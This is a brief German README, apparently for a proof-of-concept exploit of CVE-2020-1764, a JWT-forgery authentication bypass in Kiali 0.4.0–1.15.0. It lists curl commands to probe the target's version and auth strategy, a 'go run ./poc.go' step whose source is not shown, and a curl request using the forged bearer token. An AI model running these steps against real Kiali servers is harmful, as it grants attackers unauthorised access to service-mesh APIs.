
Proof-of-Concept-Exploit für die Authentifizierungsumgehung CVE-2020-1764 in Kiali 0.4.0–1.15.0, die über manipulierte JWT-Tokens unbefugten API-Zugriff ermöglicht.
Auth-Bypass-PoC für Kiali 0.4.0 bis 1.15.0 unter Verwendung der Login-Authentifizierungsstrategie (Sicherheitsbulletin)
Version prüfen: curl 'http://<IP>/api
Authentifizierungsstrategie prüfen: curl 'http://<IP>/api/auth/info'
go run ./poc.go
curl 'http://<IP>/api/status' -H "Authorization: Bearer $JWT"